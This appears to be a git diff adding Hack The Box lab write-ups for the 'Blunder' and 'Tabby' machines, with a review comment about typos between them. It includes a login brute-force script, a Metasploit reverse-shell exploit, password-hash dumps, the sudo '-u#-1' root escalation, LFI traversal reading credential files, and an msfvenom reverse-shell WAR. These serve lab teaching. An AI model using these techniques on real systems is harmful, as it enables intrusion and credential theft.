+ [+] Extensions: txt,pdf,php,html
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/06/01 14:36:08 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /.htpasswd.php (Status: 403) [Size: 277]
+ /.htpasswd.html (Status: 403) [Size: 277]
+ /.gitignore (Status: 200) [Size: 563]
+ /.htaccess (Status: 403) [Size: 277]
+ /.hta.html (Status: 403) [Size: 277]
+ /.htpasswd (Status: 403) [Size: 277]
+ /.git/logs/ (Status: 301) [Size: 0] [--> http://10.10.10.191/.git/logs]
+ /.htaccess.pdf (Status: 403) [Size: 277]
+ /.hta (Status: 403) [Size: 277]
+ /.htpasswd.txt (Status: 403) [Size: 277]
+ /.hta.txt (Status: 403) [Size: 277]
+ /.htaccess.php (Status: 403) [Size: 277]
+ /.htpasswd.pdf (Status: 403) [Size: 277]
+ /.hta.pdf (Status: 403) [Size: 277]
+ /.htaccess.html (Status: 403) [Size: 277]
+ /.hta.php (Status: 403) [Size: 277]
+ /.htaccess.txt (Status: 403) [Size: 277]
+ /0 (Status: 200) [Size: 7562]
+ /LICENSE (Status: 200) [Size: 1083]
+ /about (Status: 200) [Size: 3281]
+ /admin (Status: 301) [Size: 0] [--> http://10.10.10.191/admin/]
+ /cgi-bin/ (Status: 301) [Size: 0] [--> http://10.10.10.191/cgi-bin]
+ /install.php (Status: 200) [Size: 30]
+ /robots.txt (Status: 200) [Size: 22]
+ /robots.txt (Status: 200) [Size: 22]
+ /server-status (Status: 403) [Size: 277]
+ /todo.txt (Status: 200) [Size: 118]
+
+ ===============================================================
+ 2021/06/01 14:38:34 Finished
+ ===============================================================
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [Nextcloud/blog]
+ → curl http://10.10.10.191/install.php
+ Bludit is already installed ;)%
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [Nextcloud/blog]
+ → curl http://10.10.10.191/todo.txt
+ -Update the CMS
+ -Turn off FTP - DONE
+ -Remove old users - DONE
+ -Inform fergus that the new blog needs images - PENDING
+
+
+
+So here get hinted towards a **fergus** username, but most importantly we learn that we may have an outdated Bludit instance, and we look at the index page to find it's version:
+
+
+
+We can hypothesize that we have a Bludit instance version 3.9.2:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [Nextcloud/blog]
+ → searchsploit bludit
+ --------------------------------------- ---------------------------------
+ Exploit Title | Path
+ --------------------------------------- ---------------------------------
+ Bludit 3.9.2 - Authentication Brutefo | php/webapps/48746.rb
+ Bludit - Directory Traversal Image Fil | php/remote/47699.rb
+ Bludit 3.9.12 - Directory Traversal | php/webapps/48568.py
+ Bludit 3.9.2 - Auth Bruteforce Bypass | php/webapps/48942.py
+ Bludit 3.9.2 - Authentication Brutefor | php/webapps/49037.rb
+ Bludit 3.9.2 - Directory Traversal | multiple/webapps/48701.txt
+ bludit Pages Editor 3.0.0 - Arbitrary | php/webapps/46060.txt
+ --------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+
+
+First we're going to try and generate a password list using cewl:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Blunder]
+ → cewl http://10.10.10.191 > passwords.txt
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Blunder]
+ → cat passwords.txt| wc -l
+ 350
+
+
+
+Now there is a [blogpost](https://rastating.github.io/bludit-brute-force-mitigation-bypass/) made by rastating about a Bludit bruteforce mitigation bypass, where he wrote a python script but we're going to modify it as follows:
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Blunder]
+ → vim exploit.py
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Blunder]
+ → cat exploit.py
+ import re
+ import requests
+ import sys
+
+ host = 'http://10.10.10.191'
+ login_url = host + '/admin/login'
+ username = 'fergus'
+
+ f = open(sys.argv[1], 'r')
+ for password in f:
+ if 1 == 1:
+ password = password.strip()
+ session = requests.Session()
+ login_page = session.get(login_url)
+ csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
+
+ headers = {
+ 'X-Forwarded-For': password,
+ 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
+ 'Referer': login_url
+ }
+
+ data = {
+ 'tokenCSRF': csrf_token,
+ 'username': username,
+ 'password': password,
+ 'save': ''
+ }
+
+ login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
+ if 'location' in login_result.headers:
+ if '/admin/dashboard' in login_result.headers['location']:
+ print()
+ print('SUCCESS: Password found!')
+ print('Use {u}:{p} to login.'.format(u = username, p = password))
+ print()
+ break
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Blunder]
+ → python3 exploit.py passwords.txt
+
+
+ [...]
+
+ SUCCESS: Password found!
+ Use fergus:RolandDeschain to login.
+
+
+Now that we found fergus' password, we're going to use metasploit:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Blunder]
+ → msfconsole
+
+ msf6 > search bludit
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/linux/http/bludit_upload_images_exec 2019-09-07 excellent Yes Bludit Directory Traversal Image File Upload Vulnerability
+
+
+ Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/bludit_upload_images_exec
+
+ msf6 > use 0
+ [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+ msf6 exploit(linux/http/bludit_upload_images_exec) > show options
+
+ Module options (exploit/linux/http/bludit_upload_images_exec):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ BLUDITPASS yes The password for Bludit
+ BLUDITUSER yes The username for Bludit
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<****path>'
+ RPORT 80 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ TARGETURI / yes The base path for Bludit
+ VHOST no HTTP server virtual host
+
+
+ Payload options (php/meterpreter/reverse_tcp):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ LHOST 10.0.0.10 yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Bludit v3.9.2
+
+
+ msf6 exploit(linux/http/bludit_upload_images_exec) > set RHOSTS 10.10.10.191
+ RHOSTS => 10.10.10.191
+ msf6 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
+ BLUDITUSER => fergus
+ msf6 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
+ BLUDITPASS => RolandDeschain
+ msf6 exploit(linux/http/bludit_upload_images_exec) > set TARGETURI /
+ TARGETURI => /
+ msf6 exploit(linux/http/bludit_upload_images_exec) > set LHOST 10.10.14.13
+ LHOST => 10.10.14.13
+ msf6 exploit(linux/http/bludit_upload_images_exec) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.13:4444
+ [+] Logged in as: fergus
+ [*] Retrieving UUID...
+ [*] Uploading UPAsUhCpbE.png...
+ [*] Uploading .htaccess...
+ [*] Executing UPAsUhCpbE.png...
+ [*] Sending stage (39282 bytes) to 10.10.10.191
+ [+] Deleted .htaccess
+ [*] Meterpreter session 1 opened (10.10.14.13:4444 -> 10.10.10.191:56032) at 2021-06-01 14:59:38 +0200
+
+
+ meterpreter > sysinfo
+ Computer : blunder
+ OS : Linux blunder 5.3.0-53-generic #47-Ubuntu SMP Thu May 7 12:18:16 UTC 2020 x86_64
+ Meterpreter : php/linux
+
+ meterpreter > shell
+ Process 4491 created.
+ Channel 0 created.
+
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+And we got a reverse shell as www-data! Now as we take a look around we see the following:
+
+
+ cd ..
+ ls -lash
+ total 28K
+ 4.0K drwxr-xr-x 7 www-data www-data 4.0K Nov 27 2019 .
+ 4.0K drwxrwxr-x 8 www-data www-data 4.0K Apr 28 2020 ..
+ 4.0K drwxr-xr-x 3 www-data www-data 4.0K May 19 2020 databases
+ 4.0K drwxr-xr-x 8 www-data www-data 4.0K Apr 28 2020 pages
+ 4.0K drwxr-xr-x 3 www-data www-data 4.0K Jun 1 14:07 tmp
+ 4.0K drwxr-xr-x 5 www-data www-data 4.0K Nov 27 2019 uploads
+ 4.0K drwxr-xr-x 4 www-data www-data 4.0K Nov 27 2019 workspaces
+
+ ls -lash databases
+ total 80K
+ 4.0K drwxr-xr-x 3 www-data www-data 4.0K May 19 2020 .
+ 4.0K drwxr-xr-x 7 www-data www-data 4.0K Nov 27 2019 ..
+ 4.0K -rw-r--r-- 1 www-data www-data 438 Apr 28 2020 categories.php
+ 4.0K -rw-r--r-- 1 www-data www-data 3.4K Apr 28 2020 pages.php
+ 4.0K drwxr-xr-x 6 www-data www-data 4.0K Nov 27 2019 plugins
+ 44K -rw-r--r-- 1 www-data www-data 42K Jun 1 14:01 security.php
+ 4.0K -rw-r--r-- 1 www-data www-data 1.3K May 19 2020 site.php
+ 4.0K -rw-r--r-- 1 www-data www-data 2.3K Apr 28 2020 syslog.php
+ 4.0K -rw-r--r-- 1 www-data www-data 52 Apr 28 2020 tags.php
+ 4.0K -rw-r--r-- 1 www-data www-data 1.3K Apr 28 2020 users.php
+
+ cd databases
+ cat users.php
+ <****?php defined('BLUDIT') or die('Bludit CMS.'); ?>
+ {
+ "admin": {
+ "nickname": "Admin",
+ "firstName": "Administrator",
+ "lastName": "",
+ "role": "admin",
+ "password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
+ "salt": "5dde2887e7aca",
+ "email": "",
+ "registered": "2019-11-27 07:40:55",
+ "tokenRemember": "",
+ "tokenAuth": "b380cb62057e9da47afce66b4615107d",
+ "tokenAuthTTL": "2009-03-15 14:00",
+ "twitter": "",
+ "facebook": "",
+ "instagram": "",
+ "codepen": "",
+ "linkedin": "",
+ "github": "",
+ "gitlab": ""
+ },
+ "fergus": {
+ "firstName": "",
+ "lastName": "",
+ "nickname": "",
+ "description": "",
+ "role": "author",
+ "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
+ "salt": "jqxpjfnv",
+ "email": "",
+ "registered": "2019-11-27 13:26:44",
+ "tokenRemember": "",
+ "tokenAuth": "0e8011811356c0c5bd2211cba8c50471",
+ "tokenAuthTTL": "2009-03-15 14:00",
+ "twitter": "",
+ "facebook": "",
+ "codepen": "",
+ "instagram": "",
+ "github": "",
+ "gitlab": "",
+ "linkedin": "",
+ "mastodon": ""
+ }
+ }
+
+ cat users.php | grep password
+ "password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
+ "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
+
+ cat users.php | grep salt
+ "salt": "5dde2887e7aca",
+ "salt": "jqxpjfnv",
+
+And here we see that we found potential encrypted credentials:
+
+
+ ls -lash /home
+ total 16K
+ 4.0K drwxr-xr-x 4 root root 4.0K Apr 27 2020 .
+ 4.0K drwxr-xr-x 21 root root 4.0K Apr 27 2020 ..
+ 4.0K drwxr-xr-x 16 hugo hugo 4.0K May 26 2020 hugo
+ 4.0K drwxr-xr-x 16 shaun shaun 4.0K Apr 28 2020 shaun
+
+
+
+There are 2 users on the box: hugo and shaun so let's try to crack the 2 passwords:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Blunder]
+ → cat users.txt salt passwords.enc
+ hugo
+ shaun
+ 5dde2887e7aca
+ jqxpjfnv
+ bfcc887f62e36ea019e3295aafb8a3885966e265
+ be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Blunder]
+ → hash-identifier
+ #########################################################################
+ # __ __ __ ______ _____ #
+ # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
+ # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
+ # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
+ # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
+ # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
+ # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
+ # By Zion3R #
+ # www.Blackploit.com #
+ # Root@Blackploit.com #
+ #########################################################################
+ --------------------------------------------------
+ HASH: bfcc887f62e36ea019e3295aafb8a3885966e265
+
+ Possible Hashs:
+ [+] SHA-1
+ [+] MySQL5 - SHA-1(SHA-1($pass))
+
+ HASH: be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7
+
+ Possible Hashs:
+ [+] SHA-1
+ [+] MySQL5 - SHA-1(SHA-1($pass))
+
+
+So here we are hinted towards the passwords being SHA-1 so let's use john to try and crack them, but no, the trick here was to take a step back and see if there were any other passwords to be found !
+
+
+ pwd
+ /var/www/bludit-3.9.2/bl-content/databases
+
+ cd ../../..
+
+ ls -lash
+ total 20K
+ 4.0K drwxr-xr-x 5 root root 4.0K Nov 28 2019 .
+ 4.0K drwxr-xr-x 15 root root 4.0K Nov 27 2019 ..
+ 4.0K drwxr-xr-x 8 www-data www-data 4.0K May 19 2020 bludit-3.10.0a
+ 4.0K drwxrwxr-x 8 www-data www-data 4.0K Apr 28 2020 bludit-3.9.2
+ 4.0K drwxr-xr-x 2 root root 4.0K Nov 28 2019 html
+
+
+
+And here we see that there is a bludit 3.10.0a version ! so let's see if there are any credentials that probably got left behind in there:
+
+
+ cd bludit-3.10.0a/bl-content/databases/
+ cat users.php
+ <****?php defined('BLUDIT') or die('Bludit CMS.'); ?>
+ {
+ "admin": {
+ "nickname": "Hugo",
+ "firstName": "Hugo",
+ "lastName": "",
+ "role": "User",
+ "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
+ "email": "",
+ "registered": "2019-11-27 07:40:55",
+ "tokenRemember": "",
+ "tokenAuth": "b380cb62057e9da47afce66b4615107d",
+ "tokenAuthTTL": "2009-03-15 14:00",
+ "twitter": "",
+ "facebook": "",
+ "instagram": "",
+ "codepen": "",
+ "linkedin": "",
+ "github": "",
+ "gitlab": ""}
+ }
+
+And here we have the hugo user's encrypted passowrd let's assume that it is also SHA-1 to crack them we can use [crackstation.net](https://crackstation.net/):
+
+
+
+Here we see that taking a step back to find hugo's password was the right decision, so let's privesc to the hugo user:
+
+
+ su - hugo
+ Password: Password120
+ id
+ uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)
+ cat user.txt
+ 32XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now that's done, the way to find root access onto the box is to check the version of sudo after we spawn a TTY:
+
+
+ python -c 'import pty;pty.spawn("/bin/bash")'
+ hugo@blunder:~$ sudo -l
+ sudo -l
+ Password: Password120
+
+ Matching Defaults entries for hugo on blunder:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User hugo may run the following commands on blunder:
+ (ALL, !root) /bin/bash
+ hugo@blunder:~$ sudo --version
+ sudo --version
+ Sudo version 1.8.25p1
+ Sudoers policy plugin version 1.8.25p1
+ Sudoers file grammar version 46
+ Sudoers I/O plugin version 1.8.25p1
+
+
+
+Here we have an outdated version of sudo which is vulnerable to CVE2019-14287 which is very trivial to exploit:
+
+
+ hugo@blunder:~$ sudo -u#-1 /bin/bash
+ sudo -u#-1 /bin/bash
+ root@blunder:/home/hugo# id
+ id
+ uid=0(root) gid=1001(hugo) groups=1001(hugo)
+ root@blunder:/home/hugo# cat /root/root.txt
+ cat /root/root.txt
+ 53XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to spawn a root shell and print the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
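Review bot: the identifier in `Here we have an outdated version of sudo which is vulnerable to CVE2019-14287` is mis-written (CVE-2019-14287), and the sentence should tie the bug to the visible sudoers rule `(ALL, !root) /bin/bash`: the `!root` exclusion is exactly what `-u#-1` bypasses on sudo releases before 1.8.28, so the defensive takeaway is to update sudo and not rely on negated user lists in sudoers. Other points in the hunk: `potential encrypted credentials` and `the hugo user's encrypted passowrd` describe salted SHA-1 hashes (as the hash-identifier output reports), so `hashed` is the right word and `passowrd` is a typo; `So here get hinted towards a **fergus** username` is missing `we`, and `find it's version` should be `its`; the paragraph about rastating's script says it is modified `as follows` but never says what was changed relative to the original, and the script's `if 1 == 1:` is a leftover no-op; `<****?php` in both `users.php` listings and `<****path>` in the msf options table are mangled `<?php` and `<path>`; and `let's use john to try and crack them, but no, the trick here was` reads as a run-on and should be split into two sentences.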
diff --git a/Easy/48.md b/Easy/48.md
new file mode 100644
index 0000000..6168d16
--- /dev/null
+++ b/Easy/48.md
@@ -0,0 +1,637 @@
+# Tabby Writeup
+
+
+
+## Introduction :
+
+Tabby is an easy Linux box released back in June 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB]
+ → nmap -vvv -p- 10.10.10.194 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 22/tcp on 10.10.10.194
+ Discovered open port 8080/tcp on 10.10.10.194
+ Discovered open port 80/tcp on 10.10.10.194
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → nmap -sCV -p 22,8080,80 10.10.10.194
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-02 07:52 CEST
+ Nmap scan report for 10.10.10.194
+ Host is up (0.037s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
+ | 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
+ |_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
+ 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
+ |_http-server-header: Apache/2.4.41 (Ubuntu)
+ |_http-title: Mega Hosting
+ 8080/tcp open http Apache Tomcat
+ |_http-title: Apache Tomcat
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.24 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80:
+
+
+
+So here we found a domain name and a hyperlink leading to **megahosting.htb** so let's add it to our hosts file:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → sudo -i
+ [sudo] password for nothing:
+
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.10.10.194 megahosting.htb' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+
+
+And when we click the hyperlink to the data breach we get the following:
+
+
+
+Here we see that this is a php file with the **file** parameter and let's try to see if there is any LFI by trying to read system files such as **/etc/passwd** :
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → curl http://megahosting.htb/news.php\?file\=../../../../../../../../etc/passwd
+ root:x:0:0:root:/root:/bin/bash
+ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+ bin:x:2:2:bin:/bin:/usr/sbin/nologin
+ sys:x:3:3:sys:/dev:/usr/sbin/nologin
+ sync:x:4:65534:sync:/bin:/bin/sync
+ games:x:5:60:games:/usr/games:/usr/sbin/nologin
+ man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+ lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+ mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+ news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+ uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+ proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+ www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+ backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+ list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+ irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+ gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+ nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+ systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+ systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+ messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
+ syslog:x:104:110::/home/syslog:/usr/sbin/nologin
+ _apt:x:105:65534::/nonexistent:/usr/sbin/nologin
+ tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
+ uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
+ tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
+ landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
+ pollinate:x:110:1::/var/cache/pollinate:/bin/false
+ sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
+ systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
+ lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
+ tomcat:x:997:997::/opt/tomcat:/bin/false
+ mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
+ **ash:x:1000:1000:clive:/home/ash:/bin/bash**
+
+
+
+
+Here we see that the **file** php arguement is vulnerable to LFI, and we now know that **ash** is a valid user on this box. Now let's move over to port 8080 with tomcat:
+
+
+
+Here we have a tomcat9 instance, let's scan for hidden directories there with ffuf:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → ffuf -u http://10.10.10.194:8080/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -t 50
+
+ /'___\ /'___\ /'___\
+ /\ \__/ /\ \__/ __ __ /\ \__/
+ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
+ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
+ \ \_\ \ \_\ \ \____/ \ \_\
+ \/_/ \/_/ \/___/ \/_/
+
+ v1.3.1 Kali Exclusive
+ ________________________________________________
+
+ :: Method : GET
+ :: URL : http://10.10.10.194:8080/FUZZ
+ :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
+ :: Follow redirects : false
+ :: Calibration : false
+ :: Timeout : 10
+ :: Threads : 50
+ :: Matcher : Response status: 200,204,301,302,307,401
+ ________________________________________________
+
+ docs [Status: 302, Size: 0, Words: 1, Lines: 1]
+ examples [Status: 302, Size: 0, Words: 1, Lines: 1]
+ host-manager [Status: 302, Size: 0, Words: 1, Lines: 1]
+ index.html [Status: 200, Size: 1895, Words: 201, Lines: 30]
+ **manager [Status: 302, Size: 0, Words: 1, Lines: 1]**
+ :: Progress: [4686/4686] :: Job [1/1] :: 1211 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
+
+
+And here we found the manager page with the 302 status code, so we need to authenticate there:
+
+
+
+Now obviously putting in admin/admin doesn't get us in, however when we close it to get the 401 Unauthorized error code we get something interesting:
+
+
+
+Here we see the original credentials **tomcat:s3cret** , however they got changed obviously, so instead we shift our attention to the fact that the credentials are stored in the **conf/tomcat-users.xml** file, so let's use the LFI to get it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → curl http://megahosting.htb/news.php\?file\=../../../../usr/share/tomcat9/conf/tomcat-users.xml
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → curl http://megahosting.htb/news.php\?file\=../../../../usr/share/tomcat9/etc/tomcat-users.xml
+ <****?xml version="1.0" encoding="UTF-8"?> <****!--
+ Licensed to the Apache Software Foundation (ASF) under one or more
+ contributor license agreements. See the NOTICE file distributed with
+ this work for additional information regarding copyright ownership.
+ The ASF licenses this file to You under the Apache License, Version 2.0
+ (the "License"); you may not use this file except in compliance with
+ the License. You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ --> <****tomcat-users xmlns="http://tomcat.apache.org/xml"
+ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+ xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
+ version="1.0"> <****!--
+ NOTE: By default, no user is included in the "manager-gui" role required
+ to operate the "/manager/html" web application. If you wish to use this app,
+ you must define such a user - the username and password are arbitrary. It is
+ strongly recommended that you do NOT use one of the users in the commented out
+ section below since they are intended for use with the examples web
+ application.
+ --> <****!--
+ NOTE: The sample user and role entries below are intended for use with the
+ examples web application. They are wrapped in a comment and thus are ignored
+ when reading this file. If you wish to configure these users for use with the
+ examples web application, do not forget to remove the that surrounds
+ them. You will also need to set the passwords to something appropriate.
+ -->
+ <****!-- <****role rolename="tomcat"/> <****role rolename="role1"/> <****user username="tomcat" password=" <****must-be-changed>" roles="tomcat"/> <****user username="both" password=" <****must-be-changed>" roles="tomcat,role1"/> <****user username="role1" password=" <****must-be-changed>" roles="role1"/>
+ --> <****role rolename="admin-gui"/> <****role rolename="manager-script"/> <****user**username="tomcat" password="$3cureP4s5w0rd123!"** roles="admin-gui,manager-script"/>
+ <****/tomcat-users>
+
+And here we found credentials for tomcat: **tomcat:$3cureP4s5w0rd123!**
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → ffuf -u http://10.10.10.194:8080/manager/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -t 50
+
+ /'___\ /'___\ /'___\
+ /\ \__/ /\ \__/ __ __ /\ \__/
+ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
+ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
+ \ \_\ \ \_\ \ \____/ \ \_\
+ \/_/ \/_/ \/___/ \/_/
+
+ v1.3.1 Kali Exclusive
+ ________________________________________________
+
+ :: Method : GET
+ :: URL : http://10.10.10.194:8080/manager/FUZZ
+ :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
+ :: Follow redirects : false
+ :: Calibration : false
+ :: Timeout : 10
+ :: Threads : 50
+ :: Matcher : Response status: 200,204,301,302,307,401
+ ________________________________________________
+
+ html [Status: 401, Size: 2499, Words: 457, Lines: 64]
+ images [Status: 302, Size: 0, Words: 1, Lines: 1]
+ status [Status: 401, Size: 2499, Words: 457, Lines: 64]
+ **text [Status: 401, Size: 2499, Words: 457, Lines: 64]**
+
+
+
+Here we get the /manager/text URI and if we lookup the tomcat documentation, this is where the sysadmin can execute commands, so let's investigate it, and we can do that from curl:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → curl -u tomcat:\$3cureP4s5w0rd123! http://10.10.10.194:8080/manager/text/list
+ OK - Listed applications for virtual host [localhost]
+ /:running:0:ROOT
+ /examples:running:0:/usr/share/tomcat9-examples/examples
+ /host-manager:running:0:/usr/share/tomcat9-admin/host-manager
+ /manager:running:0:/usr/share/tomcat9-admin/manager
+ /docs:running:0:/usr/share/tomcat9-docs/docs
+
+
+
+So from here, just like for the [Kotarak](../Hard/7.html) box, we can upload a malicious WAR file to get us a shell, we're going to generate it using msfvenom:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → msfvenom -l payloads | grep java\
+ pipe>
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → msfvenom -l payloads | grep java
+ java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell
+ java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
+ java/meterpreter/bind_tcp Run a meterpreter server in Java. Listen for a connection
+ java/meterpreter/reverse_http Run a meterpreter server in Java. Tunnel communication over HTTP
+ java/meterpreter/reverse_https Run a meterpreter server in Java. Tunnel communication over HTTPS
+ java/meterpreter/reverse_tcp Run a meterpreter server in Java. Connect back stager
+ java/shell/bind_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection
+ java/shell/reverse_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager
+ java/shell_reverse_tcp Connect back to attacker and spawn a command shell
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.13 LPORT=9001 -f war > thanksippsec.war
+ Payload size: 1096 bytes
+ Final size of war file: 1096 bytes
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
